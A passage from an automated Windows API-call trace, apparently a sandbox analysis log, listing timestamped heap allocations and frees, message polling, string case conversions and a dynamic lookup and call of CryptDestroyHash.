lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0223.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0223.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0223.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabce0 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbd8 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcb0 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd10 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd28 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69670 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc50 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0223.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0223.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0223.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0223.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38663a8 | out: hHeap=0x2af0000) returned 1 [0223.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38663a8 [0223.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865b08 | out: hHeap=0x2af0000) returned 1 [0223.225] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0223.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0223.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0223.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0223.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0223.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabce0 [0223.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb60 [0223.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0223.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabd10 [0223.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd10 | out: hHeap=0x2af0000) returned 1 [0223.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0223.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabce0 | out: hHeap=0x2af0000) returned 1 [0223.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0223.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0223.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0223.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0223.225] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0223.226] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0223.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabad0 [0223.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc08 [0223.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0223.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbc0 [0223.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0223.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0223.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0223.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0223.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0223.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0223.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0223.226] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0223.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0223.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0223.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0223.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0223.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0223.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0223.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0223.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0223.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0223.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0223.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0223.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0223.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0223.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0223.227] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0223.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0223.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0223.227] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0223.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0223.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0223.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0223.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0223.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0223.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0223.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0223.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0223.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0223.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0223.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0223.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0223.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0223.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab818 [0223.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab9e0 [0223.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab758 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab7b8 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0223.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab830 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab908 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab920 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab848 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0223.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab788 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab998 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab860 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aabb18 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaba58 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcc8 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aabba8 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aabbc0 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb78 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabad0 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0223.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0223.229] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0223.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0223.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aabc08 [0223.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73db8 [0223.229] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0223.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0223.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0223.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbd8 [0223.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb60 [0223.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0223.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbf0 [0223.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0223.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0223.229] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0223.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0223.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0223.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0223.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbd8 | out: hHeap=0x2af0000) returned 1 [0223.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0223.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0223.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0223.229] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0223.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0223.230] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0223.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0223.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0223.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbd8 [0223.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabaa0 [0223.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0223.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc68 [0223.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0223.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0223.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0223.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbd8 | out: hHeap=0x2af0000) returned 1 [0223.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0223.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73db8 | out: hHeap=0x2af0000) returned 1 [0223.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0223.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0223.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc50 [0223.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0223.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb90 [0223.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbd8 [0223.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0223.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabd28 [0223.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0223.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabce0 [0223.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0223.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbf0 [0223.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0223.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0223.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0223.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc08 [0223.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0223.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0223.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc80 [0223.231] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc20 [0223.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0223.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0223.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0223.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0223.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd10 | out: hHeap=0x2af0000) returned 1 [0223.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0223.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0223.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0223.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0223.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7180, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0223.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0223.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0223.232] GetProcAddress (hModule=0x76390000, lpProcName="CryptDestroyHash") returned 0x763af0e0 [0223.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0223.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0223.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0223.232] CryptDestroyHash (hHash=0x9e2238) returned 1 [0223.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0223.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0223.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0223.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0223.232] HeapFree (in: hHeap=0x2af0000, 